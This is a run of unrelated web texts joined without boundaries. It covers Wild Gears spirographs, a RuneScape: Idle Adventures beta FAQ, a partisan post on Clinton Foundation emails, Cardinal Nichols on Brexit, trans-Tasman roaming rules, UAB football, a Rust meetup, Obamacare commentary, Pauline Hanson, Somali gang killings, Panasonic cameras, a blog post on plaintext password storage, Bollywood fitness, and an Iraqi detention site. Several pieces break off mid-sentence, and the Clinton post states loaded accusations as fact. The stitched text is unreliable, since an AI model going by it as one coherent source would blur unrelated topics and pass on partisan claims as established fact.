Spirographs were invented in the late nineteenth century by mathematician and electrical engineer Bruno Abakanowicz , but did n't become a popular toy until the 1960s . They allow you to create a wide range of kaleidoscopic designs by putting your pen into one of many holes in a set of interlocking gears , then using your pen to push the gears around an outer ring . I had n't used one since elementary school , but Bleackley 's passion reminded me of how satisfying it was to watch those amazing designs appear under my pencil .
The best part is that Bleackley was n't kidding with his humble boast . He 's the creator of Wild Gears , a company that makes several spirograph sets that are guaranteed to please your mathy , artsy , weirdness-loving mind . He prototypes his acrylic gears using a laser cutter at the Vancouver Hack Space , and fans can order his kits through the Ponoko store .
A former environmental chemist , Bleackley has so far funded his work with two extremely successful Kickstarter campaigns . His work is beloved by the spirograph community on YouTube , and his goal is always to create bigger and better designs ( he 's got a tutorial on 1001 things you can do with spirographs here ) .
Bleackley told Ars that people like his gears because they 're transparent , so you can see the art emerging as you make it . But mostly they love the nutty creativity of his gears , which come in basic round gear sets , but also in `` strange '' shapes and snap-together pieces that allow you to create your own gears . One of his recent sets even does something that spirograph fans thought impossible : it allows you to create parallel lines in your design .
Watching Bleackley 's spirograph videos made me realize that this art form is an even geekier and more satisfying version of the adult coloring book craze . You can make your own geometrical shapes , then color them in . It 's an incredibly soothing activity that engages your mind and results in very cool images .
Listing image by Aaron Bleackley
RuneScape : Idle Adventures CLOSED BETA FEEDBACK COLLECTION
Welcome to the RuneScape : Idle Adventures Closed Beta ! We 've put together a few questions to help you out , but if you need assistance with anything else , please comment below !
- The RuneScape : Idle Adventures Team
-- -- -- -
1 . How long is the Beta ? !
Since we 're doing a staggered release of the Beta , we do n't have a confirmed timeline for when the Beta will close . However , we will notify everyone well in advance when time comes !
2 . Does my progress save after the Beta is done ? !
As this is a Beta , your progress will not carry over to the final version . There is also potential that your progress made be lost with updates or bug fixes , so be warned !
3 . How do I provide feedback to the devs ? !
We 'd love to hear any and all feedback you may have ! Please comment within the Forums with whatever you 'd like to share !
4 . Oh no ! I lost all of my progress - what do I do ? !
Sorry to hear that ! With the nature of a Beta version , there can be bugs and strange occurrences . Unfortunately , there is n't anything we can do to restore your progress . However , we 're going to have tools to do so within the final version !
5 . Do I get anything special for participating in the Beta ? !
Yes ! We 're going to figure out a special gift for all of those who helped out with the Beta test . More info to come !
6 . My game is all messed up - how do I start over ? !
Click on the “ Gear ” icon in the top right , and then click “ Hard Reset ” - it will start you over !
7 . I 'm stuck - what do I do ? !
Click on your Quest Tab to double-check what you need to do . No quests ? Look for an `` ! '' icon on
8 . How do I get hard currency ? !
Each player will be awarded 10 Gold per day , so make sure you keep checking back !
9 . What are the min specs for the game ?
WINDOWS
MINIMUM :
OS : Windows 7
Memory : 2 GB RAM
DirectX : Version 10
Storage : 700 MB available space
===================
MAC OS X
MINIMUM :
OS : Mac OS X 10.7
Memory : 2 GB RAM
Storage : 700 MB available space
10 . My game is stuck and wo n't load - what can I do ?
In some cases , deleting your Regedit files for RS : IA can help with this . Here is what you need to do :
1 . Search your computer for `` Regedit ''
2 . Once Regedit is open , go to Edit > Find : Hyper Hippo Games
3 . Open the Hyper Hippo Games folder - delete the `` Idle Adventures '' folder within it
If this does n't help , please send us your Log Files at `` rsidleadv @ hyperhippo.ca '' . Here how you can find them :
Right-click RuneScape : Idle Adventures in your Steam Library
Select `` properties '' at the bottom of the right-click menu
Select the `` local files '' tab of the popup that appears
Select `` browse local files ... ''
Open the `` idle-adventures_Data '' folder
Copy/paste `` output_log.txt '' into an email as an attachment
!
In the latest installment over Hillary Clinton 's email scandal , conservative watchdog group Judicial Watch released 296 pages of new emails from Hillary 's personal server , most of which were not handed over as part of the 30,000 emails originally provided to the FBI . The emails were provided to Judicial Watch pursuant to a FOIA request . These new emails , among other things , demonstrate how the Clinton Foundation and it 's top donors sought favors from the State Department within 3 months of Hillary taking the Secretary of State position .
According to an article in the Wall Street Journal :
“ That the Clinton Foundation was calling in favors barely 3 months into Hillary Clinton 's tenure at the State Department is deeply troubling , and it is yet another reminder of the conflicts of interest and unethical wheeling and dealing she 'd bring to the White House , ” said Michael Short , a spokesman for the Republican National Committee , in a statement Tuesday .
The first request for a `` favor '' came in April 2009 , just 3 months after Hillary was confirmed as Secretary of State on January 21 , 2009 . The request came from Doug Band , a long-time adviser to Bill Clinton who helped him setup the Clinton Foundation after his Presidency . Per the email exchange , Mr . Band reached out the State Department to ask a `` favor '' on behalf of a person who the Clinton Foundation had recently setup with a trip to Haiti which he found `` eye-opening '' ( the name of the person seeking the favor was redacted from the email exchange ) . Yes , well trading taxpayer dollars intended for earthquake relief in exchange for lucrative gold mining contracts from the Haitian government can be quite `` eye-opening '' indeed ( see our post `` Clinton Cash : `` Devastating '' Documentary Reveals How Clintons Went From `` Dead Broke '' To Mega Wealthy '' ) .
In an exchange from April 2009 , a longtime aide to Mr. Clinton told three of Mrs. Clinton 's top advisers that it was “ important to take care of ” a particular person , whose name has been redacted from the document . That person had written the aide , Doug Band , under the subject line “ A favor… ” to thank him for the “ opportunity to go on the Haiti trip , ” which the person called “ eye-opening. ” Mr . Band was a chief adviser in helping Mr. Clinton launch the Clinton Foundation after leaving the White House .
Another request came from Gilbert Chagoury , a long-time associate of the Clintons with a checkered past . Chagoury is known for his ties to Nigeria 's military dictator , Sani Abacha , who was instrumental in helping him secure some lucrative construction contracts in the mid-90s . In 2003 , Chagoury helped organize a trip to the Caribbean where former President Bill Clinton was `` paid '' $ 100,000 for a speech . Chagoury has also made bribes contributions to the Clinton Foundation of between $ 1- $ 5 million . Per the Wall Street Journal :
“ We need Gilbert Chagoury to speak to the substance person re Lebanon , ” Mr . Band wrote in April 2009 . “ As you know , he 's key guy there and to us and is loved in Lebanon . Very imp . ”
Mr. Chagoury , a Lebanese-Nigerian billionaire , has donated between $ 1 million and $ 5 million to the foundation , according to its disclosures .
Ms. Abedin responded with the name of the State Department official , Jeff Feltman , who had served as a U.S. ambassador to Lebanon before becoming U.S. assistant secretary of state for Near Eastern Affairs . “ I 'm sure he knows him , ” she wrote . “ I 'll talk to Jeff . ”
Fifteen minutes later , Mr . Band shot back : “ Better if you call him . Now preferable . This is very important . ”
In yet another email , Clinton chief of staff Cheryl Mills wrote to Hillary to inform her that the NSA was working on a modified blackberry that could be used for personal emails while working in restricted State Department offices . Even though Clinton thought this was `` good news '' she continued to just use her personal server anyway . Per the AP :
In another email , Clinton 's chief of staff , Cheryl Mills , informed her that National Security Agency and State Department officials discussed an attempt to develop a modified blackberry for Clinton that might be used when she worked in a restricted State Department office that did not allow private phones .
So why were these emails not included in the original disclosure to the FBI ? Could it be possible that Hillary believes that using her position as Secretary of State to setup meetings between former U.S . Ambassadors and shady international businessmen is somehow `` personal '' in nature ? Makes you wonder what else was excluded from the FBI disclosures that was purely `` personal . '' Guess we 'll just have to elect her to find out if we can trust her .
The emails obtained by Judicial Watch can be reviewed in their entirety below :
LONDON — Cardinal Vincent Nichols of Westminster has said some British media were stirring up xenophobic sentiments against migrants and refugees .
The cardinal suggested that some media were guilty of fostering a climate of fear of refugees ahead of the June 23 referendum that resulted in a surprise vote for the United Kingdom to leave the European Union . He told a Nov. 18 press conference attitudes toward migrants had since hardened , making it harder for humane solutions to be found to the refugee crisis in the Middle East and the crisis of mass migration from Africa .
Speaking at a London press conference after an annual November meeting of the bishops of England and Wales in Leeds , Cardinal Nichols said : “ We were concerned about the levels of intolerance , of attitudes hardening , of attitudes of exclusion .
“ It is the fostering of a climate of fear that actually makes finding solutions more difficult , ” said Cardinal Nichols , the president of the Bishops ' Conference of England and Wales .
“ I believe that the constant repetition of the dangers of the risks of refugees and the constant putting into the public sphere of fear actually masks a deeper level of compassion that exists within many people in this country , ” he said .
The cardinal said the bishops collectively “ expressed our regret of the emergence of harder attitudes toward people who have migrated to be in this country and our regret at the way those views are given such ample expression , particularly in parts of the media . ”
Nichols added that inevitable economic consequences of Brexit — such as rising inflation , possible restrictions on trade with the European Union and the devaluation of British currency — would be felt “ most keenly at the bottom of the economic ladders . ”
He said the bishops of England and Wales would seek ways to offer practical help to poor people hit by such changes .
Nichols insisted , however , that there had not been a significant number of attacks on European migrants despite the rising mood of xenophobia .
He said the bishops asked Polish Catholic chaplaincies for feedback after Polish President Andrzej Duda appealed to him following the Aug. 27 murder of Arkadiusz Jozwik , 40 , who was beaten to death by a teenage mob in Harlow , England .
Duda urged Nichols and Archbishop Justin Welby , leader of the worldwide Anglican Communion , to do whatever they could at the parish level to prevent such violence against Poles .
The Catholic chaplains reported that there was very little evidence of increased aggression against Polish nationals living in Britain , saying most of them felt “ welcome and secure , ” Nichols said .
“ From the chaplains ' point of view , they have a very , very low count of acts of aggression or violence toward the Polish community , ” he said .
“ They are well-informed about what is happening on the ground , ” Nichols continued . “ This led us to reflect on the manner of the referendum and some of the consequences of the vote . ”
Ahead of the referendum , most of the British national newspapers — including the best-selling tabloids and titles normally supportive of the ruling Conservative Party — were openly in favor of Brexit .
Early in November , the Manchester parish of St. Monica in the Diocese of Salford became the first Catholic parish in England to help to find a home for a Syrian family in response to the appeal of Pope Francis for churches to welcome refugees .
The Australian and New Zealand governments have decided to regulate high trans-Tasman mobile roaming rates , following industry consultation and the commissioning of several market studies .
The announcement was made this weekend by Prime Ministers Gillard and Key in Queenstown , New Zealand .
It was timed to coincide with the publishing of the joint final report on roaming rates by Australia 's department of broadband , communications and the digital economy ( DBCDE ) and New Zealand 's ministry of business , innovation and employment ( MBIE ) .
The report recommended that telco regulators in Australian and New Zealand be granted expanded powers to allow them to intervene in the market and cooperate where necessary .
Regular reports and information collection will also be compiled by the ACCC and the NZ Commerce Commission on mobile roaming rates .
Regulators in both countries will be able to apply price caps on wholesale and retail services on individual telcos , without having to limit charges across the entire field of providers .
Telcos will be obliged to provide mobile local-access service to customers , enabling them to use their devices overseas with their original phone number without having to swap SIM cards .
The ACCC first examined high mobile roaming rates in 2005 . In 2009 , Australia 's house or representives standing committee on communications released a report recommending the government begin bilateral negotiations with other countries that receive large numbers of Australian visitors .
Senator Stephen Conroy and New Zealand 's then Minister of Communications and Information Technology , Steven Joyce released a discussion document the following year . A full investigation into the roaming market was launched in April 2011 .
Mobile roaming rates have come down since 2009 , the report noted , suggesting `` positive progress '' albeit with margins still being high and no Australian or NZ operator having introduced a local access service .
While New Zealand telcos such as Telecom and Vodafone have lowered roaming rates greatly over the past few years , their Australian counterparts have not adjusted them down in a similar fashion .
Vodafone NZ wrote in its submission that `` significant reductions in wholesale inbound roaming in New Zealand do not appear to have resulted in reductions in retail roaming rates by Optus and Telstra over this time . ''
“ Australian retail pricing for roaming in New Zealand appears to be much higher than the retail prices paid by New Zealanders who roam in Australia… [ even though ] the blended [ wholesale ] rates Australian and New Zealand carriers charge each other are similar '' , wrote NZ operator 2 Degrees in its submission .
Full text of the joint DBCDE-MBIE report on trans-tasman mobile roaming rates below .
UAB announced Wednesday the Alabama Power Foundation has committed $ 500,000 to the proposed football operations building .
The UAB Athletic Foundation 's campaign 's goal is to raise $ 15 million . The building is expected to house film rooms , training facilities , locker rooms , a weight room and more .
`` We already have excitement in and around the program and are working hard toward 2017 , '' UAB football coach Bill Clark said in a released statement . `` Watching shovels hit the dirt and steel come out of the ground will boost the energy even more -- in our recruiting , on the practice field , in the meeting room and in the weight room . Our return is very real , and this facility is a tangible symbol that we are coming back to be stronger than ever . ''
UAB athletic director Mark Inram said the plan is to have the building complete by time the Blazers hit the field for the 2017 season .
`` We have a lot of work to do , and additional steps toward full approval of the project remain , '' Ingram stated in the release . `` But we are approaching this project aggressively , and the unprecedented fan and financial support we have seen of late continues to grow . Respected business and community leaders like Alabama Power and Protective Life seeing the value in this project sends a clear message to other potential donors , and we are grateful for their vote of confidence . ''
UAB has been working on the building design and soliciting private donations . Once those two factors meet board approval , the construction bid will start .
`` We join with the many organizations getting behind this project because it has broad implications in expanding UAB 's growing economic and cultural contributions to our region , '' Myla Calhoun , Alabama Power 's vice president for Charitable Giving , said in the statement . `` UAB has been central to Birmingham 's resurgence , and UAB Athletics is seizing an opportunity to build excellence across its programs that will be felt in very positive ways across our city . ''
Come and join us in a great and rusty evening ! Rustaceans from all levels are welcome : from hello world programmers to compiler hackers , let 's have a great time together and write some code .
Workshop
We are planning on introducing a bit of competition , so concrete details will only be revealed at the beginning of the workshop ; )
As in previous occasions , advanced users can help beginners to get started by teaming up or just answering questions .
Schedule
19:00 – Welcome with drinks
19:30 – Talk : my experience with Tokio , by Dirkjan Ochtman
20:00 – Workshop
22:00 – Fin
Preparation
Please bring your laptop , and try to get Rust installed ( https : //www.rust-lang.org/en-US/install.html ) before the workshop .
If you are interested in speaking or hosting a future meetup , please get in touch .
Soon after Charla McComic 's son lost his job , his health-insurance premium dropped from $ 567 per month to just $ 88 , a “ blessing from God ” that she believes was made possible by President Trump . “ I think it was just because of the tax credit , ” said McComic , 52 , a former first-grade teacher who traveled to Trump 's Wednesday night rally in Nashville from Lexington , Tenn. , with her daughter , mother , aunt and cousin . The price change was actually thanks to a subsidy made possible by former president Barack Obama 's Affordable Care Act , which is still in place , not by the tax credits proposed by Republicans as part of the health-care bill still being considered by Congress .
This is quite a moment . We 've reached the point at which some conservatives decide they like Obamacare so much that they 're inclined to give Trump credit for it.It reinforces the idea , voiced by many in recent weeks , that Republicans could very easily write up some superficial changes to the Affordable Care Act , put it in the form of legislation , pass it , and wait for voters – most of whom are increasingly fond of the ACA – to thank them.This could effectively be the health care version of George Aiken 's famous paraphrase from the Vietnam era : Declare victory and go home.GOP policymakers obviously intend to go in a very different direction , targeting benefits that many Trump voters currently want and enjoy . What 's unclear is what they 'll think if that happens.The woman the Post spoke to in Tennessee went on to say she trusts Trump not to curtail her family 's benefits , and she hopes “ more and more people ” get coverage through the Republican legislation.Except , we know - and Republicans concede – that the exact opposite is true : “ more and more people ” will be uninsured as a result of the bill some are calling “ Trumpcare. ” And while I 'm skeptical the GOP plan will become law , I remain curious what the president 's die-hard supporters will think if Trump leaves them in much worse shape than they 're in now.My hunch is , most will turn on him . As we discussed the other day , the Republican made all kinds of promises to these folks , well aware of what 's popular and what they wanted to hear . If he ends up pulling the rug out from under them , they 're going to notice – and White House spin wo n't obscure their health care reality .
Michael P writes :
A friend of mine spotted that Paul Murphy is being a bit cheeky . He 's sharing an Irish Times article about him on his Facebook , but has edited the headline to make it seem like it 's suggesting that he 's got a chance in the election .
The real headline is ( and was , judging by the URL ) “ Socialist MEP appeals for support for third Dublin seat ” . Yet when he shared it on Facebook , he edited the Irish Times article to say “ Murphy best placed to take third seat from Labour & FF ” . The article and polls suggest no such thing . Harry McGee from the Irish Times actually reckons that the last Dublin seat is down to Eamon Ryan ( Greens ) and Mary Fitzpatrick ( FF ) , and will just depend on first preferences .
The protest stretched as far as Australia , with One Nation leader , and openly pro-Trump supporter , Pauline Hanson commenting on Brisbane 's 400-person-strong turnout
In a global , history-making protest , more than three million people across the planet banded together over the weekend to fight for human rights as part of the worldwide Women 's March
“ Do n't these clowns have anything else better to do with their time other than to hold sad , anti-democracy protests ? ” she wrote on Facebook , clearly not planning on holding anything back .
“ Why on earth would anyone want to walk around in this heat chanting about One Nation and the new President of the United States of America , Donald Trump ? ”
“ Oh well , at least they did n't seem as bad as the left wing protesters in Washington who were vandalising businesses and committing assaults . ”
“ And I suppose it 's good that they were out and about and doing a bit of walking because it looked like a few of them needed to get a bit of sun and do a bit of exercise . ”
Wait… what ?
Sure , we did n't exactly expect the One Nation leader to wave her own hand-painted sign high in the air against President Trump , but her fat-shaming comments serve as an unnecessary low blow that is in no way fair , let alone sensical .
Not only that , but her words just add fuel to the Trump-ignited flame of exactly what pro-women 's rights activists are striving to put out : slanderous comments pertaining to the mere appearance of a person – male or female .
Seriously , Pauline , please explain why you think it 's OK to fat-shame the people who you are supposed to be ‘ representing ' on the nation 's political front ?
Because , quite frankly , we do n't like it .
Ahmednur Ali 's family fled the chaos and violence of their West African homeland Somalia in the 1990s , eventually making their way to Minnesota like thousands of their compatriots .
While many of the estimated 32,000 Somalis who settled in the state have struggled to adapt , Ali flourished , blazing a path to Minneapolis ' Augsburg College on a soccer scholarship by age 20 . He studied political science and aspired to a political career modeled on President Barack Obama 's .
He was shot and killed last September outside a busy community center where he worked part-time as a youth counselor , and prosecutors said the 16-year-old accused of killing him was part of a gang .
Ali was one of seven Minneapolis-area Somali men killed over a 10-month period , and authorities believe all were killed by fellow Somalis . Police say it 's too simple to tie all the killings to Somali gangs , which have lured hundreds of young community members to their ranks in recent years .
Those in the insular community willing to speak out , however , disagree .
`` It was all gang activity , totally , 100 percent , '' said Shukri Adan , a former Somali community organizer who estimated in a 2007 report for the city that between 400 and 500 young Somalis were active in gangs . `` The police do n't want to say that but everybody else knows that . ''
Despite anger and despair over the killings in Minnesota 's Somali community - the nation 's largest - police and prosecutors have struggled to catch and try the killers . Few witnesses have stepped forward because of a fear of reprisal and deep-rooted distrust of authority . More than half of Minnesota 's Somalis are living in poverty , according to state statistics , and many complain that authorities are biased against Somalis because of their Islamic faith .
Last month , prosecutors dropped the murder charge against the teenage boy in Ali 's case after one witness backed out and another apparently fled the state .
Gangs like the Somali Hot Boyz , the Somali Mafia and Madhibaan with Attitude have grown more active in recent years , said Jeanine Brudenell , the Minneapolis Police Department 's Somali liaison officer .
The recent spate of killings started in December 2007 , when two Somali men , ages 27 and 25 , were found shot to death at a south Minneapolis home . No arrests have been made in that case .
They culminated last September , when a man was fatally shot outside of the Village Market Mall , a cluster of Somali-owned businesses and a popular destination for local Somalis . Investigators believe the shooter was retaliating for the death of his cousin , one of the other slain Somalis . The mall shooting was the only of the seven slayings for which anyone was convicted - 23-year-old Hassan Mohamed Abdillahi .
Hennepin County Attorney Mike Freeman said he hoped the conviction would show local Somalis that the law is on their side , and spark new progress in closing the other cases . `` We have a job to do to convince people they can trust us , '' he said .
A gang expert in California said economic and social factors are more likely to blame for the spike in gang activity than any spillover of violence from war-ravaged Somalia .
`` When there 's unemployment and poverty and lack of external support , there are gangs , '' said Jorja Leap , a social welfare professor at the University of California Los Angeles and former gang adviser to the Los Angeles County Sheriff 's Department .
Investigators in a separate criminal investigation have said they 've also had trouble penetrating Minnesota 's Somali community . The FBI is looking into the disappearance in recent years of up to 20 young Somali men , mostly from Minneapolis , believed to have been recruited into Islamist terror groups back in Somalia .
The first sign of progress in that investigation came this week with the indictment on terrorism charges of two young Somali men , at least one of whom is accused of traveling to Somalia to fight .
Elsewhere in the U.S. and Canada , police and community officials have reported an increase in Somali gang activity .
In and around Edmonton , Alberta , six young Somali men have been slain in the last six months . The leader of a small Somali outreach group there said the deaths are seen as evidence of a growing gang problem , and that they 've led to better cooperation between Somalis and police .
`` It seems like the community now is getting to the point where we are trying to give information to the police , and they are sharing information with us , '' said Mohamednur Mardowe , who heads the Brotherhood Community Support Service Association .
Police in Columbus , Ohio , which has the second largest U.S. population of Somalis , have also seen growing evidence of Somali gangs , said Sgt . Chantay Boxill .
Ahmednur Ali 's sister , Hindia Ali , said she hopes her fellow Somalis will stand up against the violence .
`` I do n't think any Somali person wants killing to continue , '' she said . `` We all want this violence to stop . ''
Panasonic announces new bridge superzoom , compact mirrorless , 12-60mm f/2.8-4.0 lens and more
This is certainly a big CES 2017 for Panasonic ! In addition to their new flagship camera , the Panasonic GH5 , the Japanese company has also announced the FZ80 and GX850 cameras in addition to five lenses . Exciting times in the Panasonic camp , indeed !
Panasonic FZ80
We 'll start with the new FZ-series camera , the Panasonic FZ80 . The successor to the FZ70 has been a long time coming , but it looks to be worth the wait . It features the same 60x optical built-in 20-1200mm equivalent zoom lens , but includes a new 18.1-megapixel sensor . The FZ80 also includes a wide array of 4K video and photo recording modes , making it a very capable multimedia camera for its roughly $ 400 price tag . The FZ80 will be released in March and you can learn much more by reading our Panasonic FZ80 Overview .
Panasonic FZ80 Bridge Superzoom
Panasonic GX850
Next up is the Panasonic GX850 . This sleek , stylish selfie-friendly camera is a compact mirrorless model capable of shooting images at up to ISO 25600 , and it can also record high resolution 3840 x 2160 4K video at up to 30 frames per second . The 16-megapixel camera offers the full range of Panasonic 's 4K Photo modes as well , including 4K Burst and Post Focus . The GX850 will be available in early February for just under $ 550 . Read our Panasonic GX850 Overview to get all the details !
Panasonic GX850
Four refreshed lenses
Now we 'll move on to the optics . There are four lenses which are being refreshed with the latest technologies , including Power O.I.S . to help you capture sharper shots at slower shutter speeds while handheld . All four lenses are compatible with Dual I.S. , 5-axis Dual I.S . and 5-axis Dual I.S . 2 systems when mounted to compatible cameras . The lenses utilize inner focus drive system autofocus and a new micro-step drive system aperture control , meaning that they are well-suited for recording video with quiet AF performance and smooth brightness transitions when zooming . Further , the lenses are equipped with a new exterior finish .
The refreshed lenses are as follows :
Lumix G X Vario 12-35mm f/2.8 II ASPH . Power O.I.S . ( Available in March for $ 1,000 )
Lumix G X Vario 35-100mm f/2.8 II Power O.I.S . ( Available in March for $ 1,100 )
Lumix G Vario 45-200mm f/4.0-5.6 II Power O.I.S . ( Available in February for $ 450 )
Lumix G Vario 100-300mm f/4.0-5.6 II Power O.I.S . ( Available in February for $ 650 )
All-new Pansonic Leica DG Vario-Elmarit 12-60mm f/2.8-4.0 ASPH . Power O.I.S . lens
And it is n't simply refreshed lenses that Panasonic has announced . They have an all-new addition to their lineup , the Leica DG Vario-Elmarit 12-60mm f/2.8-4.0 ASPH . Power O.I.S . lens . The 24-120mm equivalent lens offers a versatile 5x optical zoom design , making it suitable for a wide range of photographic situations , from landscapes to portraits and more .
Panasonic Leica DG Vario-Elmarit 12-60mm f/2.8-4.0
The lens features 14 elements in 12 groups , including four aspherical lenses and two ED lenses that are designed to help achieve excellent image quality . The included Power O.I.S . stabilization system , which is compatible with Dual . I.S . 2 , makes the lens more useful in low-light situations .
Image shifts during zooming can be frustrating , particularly when recording video , so Panasonic has designed the 12-60mm optic to have `` exceptional barycentric stability , '' meaning that the camera will have minimized image shift . To help deal with brightness changes when zooming or panning , the lens also has a micro-step drive system in the aperture control section . Further , the inner focus drive system is said to be silent , perfect for using autofocus during recording .
Panasonic Leica DG Vario-Elmarit 12-60mm f/2.8-4.0
This lens is the first in Panasonic 's Leica DG Vario-Elmarit f/2.8-4.0 series , but Panasonic has announced two more lenses which are presently under development . There is an 8-18mm wide angle zoom and a 50-200mm telephoto zoom lens , both f/2.8-4.0 optics . Pricing is currently listed at US $ 997.99 and the scheduled availability is anticipated for the end of March 2017 .
It never ceases to amaze me how many sites completely ignore generally accepted password safety practices .
A few weeks ago , I applied for the Google Computer Science Summer Institute . Google outsourced the online application to eResources , who claims to be “ Your Trusted Technology Partner . ”
Earlier in the year , I had created an account on this site and filled out some basic information . For some reason , the password was n't saved in my password manager of choice , and I could n't remember it . After a few guesses , I hit the “ Forgot Password ” link , typed in my E-Mail address , and was sent the message shown below .
Yes . That 's right . They sent me my password . In plaintext . In an E-Mail .
Mind you , I 'm not particularly upset that they sent me my password in an E-Mail ( although it is n't particularly secure ) . I do n't really care how they sent it to me . They could have sent twelve angry weasels each bearing one of the twelve keys necessary to open a secret underground fortress that contained my plaintext password deep in one of its seventeen dungeons . I would still be pissed . The issue is n't that they gave me my password , the issue is that they had my password to give to me .
Passwords should never be in plaintext on the server .
There 's a common misconception with this . Just because it 's encrypted on your server does n't mean that it is n't in plaintext . If I could somehow extract my password based on the information stored on your server , then as far as I 'm concerned , you 're storing my password in plaintext . And that is not okay .
Why is this important ? Well , it 's very simple . Your server might be compromised . The contents of your database might be released . Many internet users use the same password on multiple websites , and if you accidentally leak their password in plaintext , all of their other accounts are in immediate jeopardy . Plenty of high-profile sites have been compromised . It can happen to you !
What 's the alternative ? Hash the passwords , and with a unique salt for each user . When a user submits their password to you , concatenate the salt and hash the combination . You may then store this hash ( and the salt , separately ) in your database and perform the same hashing routine each time a user tries to log in . Their passwords are never written to the database , and their passwords ca n't be extracted from the hashes . Better yet , even if two users have the same password , their hashes are completely different ( thanks to the salt ) .
More information on safely hashing passwords is readily available , you just have to look . For example , ensure you are using a suitable hashing algorithm .
Shortly after I noticed this basic password security violation , I notified both Google and eResources of the issue . I carefully selected a subject line likely to grab attention : “ Password Security Concern ” . A representative from eResources sent me back the following email promptly :
Eric – Thanks for expressing your concern . I will pass it on to the administrators of this program . While I recognize that this is n't as secure as a reset password link , your password is stored in an encrypted format and then decrypted before it is emailed to you . Best regards , [ Name Redacted ]
While , yes , encrypting the passwords is more secure , it 's roughly the equivalent of preventing intruders from entering your house by simply closing the door . If I 've somehow gained access to your database , I likely have the ability to access your code as well , which means I can just decrypt everything . Passwords need to be non-reversibly hashed .
Do n't get me wrong . eResources is not alone in their blatant disregard for even the most basic levels of password security . There are , unfortunately , thousands of other incompetent or uninformed companies on the web making the same mistakes . This , however , does not make the offense excusable .
Google certainly knows better than this , and has a direct responsibility to ensure that their users ' data remains safe . They have yet to respond to my email .
eResources is not Google , but by using them , Google endorses their product . Google is putting their scholarship applicants ' passwords on the line , and this is simply not acceptable .
Rachel Dwyer , a leading scholar of Indian cinema , said early male stars like Dilip Kumar and Dev Anand never took off their shirts or drew attention to their bodies . Now Indian actors are waxing their legs or chests and posing for suggestive photographs . A fit body , Ms. Dwyer said , has become a status symbol . “ The muscular body is very much a class thing , ” she said . “ The whole fitness cult in India is a marker of upward mobility . ”
Photo
Prashant Talwalkar , the chief executive of one of India 's biggest chains of fitness centers , said bodybuilding was considered a sport of lower-income men until the 1990s , when Mr. Khan popularized weight lifting and having a muscular physique . Mr. Talwalkar recalled working at one of his Mumbai gyms in 1997 when a teenage boy walked in and placed 10,000 rupees , the equivalent of $ 182 today , on the front counter .
“ Make me look like Salman Khan , ” the teenager said . Mr. Talwalkar added : “ Salman Khan has been like a symbol , synonymous with the body . People keep saying , ‘ I want to look like him . ' It 's like they want a Xerox . ”
Today , almost every Bollywood leading man swaggers and flaunts beefcake on-screen . Personal trainers to the stars have become minor celebrities in Mumbai , featured in movie magazines . And the abdominal muscles — known as the six-pack — have become a source of bragging rights for the biggest stars . The megastar Shahrukh Khan recently boasted that he was training to achieve an eight-pack for an upcoming film .
“ There 's no other film industry in the world where people are talking about how many packs they have , or their abs , ” said Anuparma Chopra , a Bollywood commentator and talk show host .
This rising machismo is not limited to the big screen in India . Scholars note that the body images of some Hindu deities , especially the god of Ram , have undergone a reimagining during the past two decades . Before , Ram was often depicted on ubiquitous wall calendars as lithe and slender , but by the 1990s calendar artists were usually depicting him as a muscular deity . Many calendar artists told scholars that they altered the image to succeed in a changed marketplace .
In a socially conservative country , Bollywood stars often try to push boundaries in the name of self-promotion , as the news media seizes on every little barrier broken . The buffed-up actor John Abraham posed for his film Dostana by suggestively pulling down his skimpy bathing suit . The somewhat less buffed-up actor Tusshar Kapoor then spoofed that photo in May to promote his own comedy , gleefully proclaiming his excitement about his hint of backside in a May 16 headline in The Bombay Times , an entertainment insert to the Mumbai edition of The Times of India .
Advertisement Continue reading the main story
For Shanoo Sharma , one of the most powerful casting directors in Bollywood , the focus on displaying beefcake has created a problem : nearly every casting call is laden with muscled up twentysomethings . Yet many roles call for a different physique . “ We do n't necessarily look out for someone who is buffed and who looks like Salman Khan , ” she said .
Photo
In Mumbai , the hometown of Bollywood , fitness centers are filled with aspiring actors and actresses who zealously measure body fat and muscle mass while watching their diets . Arjun Kohli , 22 , works out every day , adheres to a strict diet but is now trying to shed some muscle mass so that he can audition for roles as college students .
“ You see people going there , huge guys , muscular guys , and they are not getting roles , ” Mr. Kohli said . Yet one thing he said he will not shed ? His six-pack . It is too handy , he said , noting that he recently got work modeling for a magazine .
Bollywood films , despite the increasing exposure of skin , remain far more conservative than typical Hollywood fare : many actors refuse to kiss on-screen . Bedroom scenes are extremely rare ; in the past , a lovemaking scene was symbolized by the image of hands clasping — and then unclasping .
Newsletter Sign Up Continue reading the main story Please verify you 're not a robot by clicking the box . Invalid email address . Please re-enter . You must select a newsletter to subscribe to . Sign Up You will receive emails containing news content , updates and promotions from The New York Times . You may opt out at any time . You agree to receive occasional updates and special offers for The New York Times 's products and services . Thank you for subscribing . An error has occurred . Please try again later . View all New York Times newsletters .
Yet as India is increasingly awash with satellite television , the Internet and other forms of entertainment , Bollywood has faced new pressures to hold public attention .
“ We have to create hype , ” said the veteran actor Anupam Kher . Mr. Kher , who runs a prominent acting school , is critical of the emphasis on bodybuilding , even as he understands the commercial pressures causing it . “ Now you are luring audiences not only with the story and the stars , ” he said . “ You are luring them with six-packs , saying this is how your body should be . ”
For Arjun Kapoor , the lead role in “ Ishaqzaade ” required a complete physical makeover . He had been an overweight assistant director , a member of a prominent Bollywood film family , when Salman Khan himself encouraged him to take up acting — assuming he got into shape . For Mr. Kapoor , the six-pack represented a personal triumph .
“ I had one big ab that has been processed into six , ” he joked .
Army officials say Chinese laborers built all the facilities on Forward Operating Base Loyalty , Iraq , including the notorious former detention center used by the old regime . After construction , Saddam Hussein allegedly charged them with espionage and they became its first occupants . Cantonese is scribbled on the walls of many cells .
Notorious detention center now used for storage for FOB Liberty
FORWARD OPERATING BASE LOYALTY , Iraq — It 's a place that still terrifies the Iraqi people .
Now home to the 3rd Infantry Division 's 2nd Brigade Combat Team , this base in eastern Baghdad was once the site of Iraq 's General Security National Headquarters , an intelligence nerve center used with chilling effect by the Saddam Hussein regime .
“ When we were here in 2003 , a lot of our interpreters would n't even come inside the gates , ” said Army 1st Lt. Greg Holmes of Cobleskill , N.Y. , the 2nd Brigade 's assistant intelligence officer .
That 's because most Iraqis remember the notorious former detention center tucked away on the grounds , one of hundreds just like it across the country . The Army now uses it for storage , but the old jail remains a haunting symbol of the past — with tattered concrete walls and metal doors that offer disturbing tales of what transpired inside .
“ The base was their version of the Iraqi FBI , responsible for internal security , ” said Maj. Steve Rosson of Jonesboro , Ill. , intelligence officer for the 2nd Brigade . “ Many Iraqis today still refuse to walk near the prison . The belief was that once you walked inside the walls , you were never seen again .
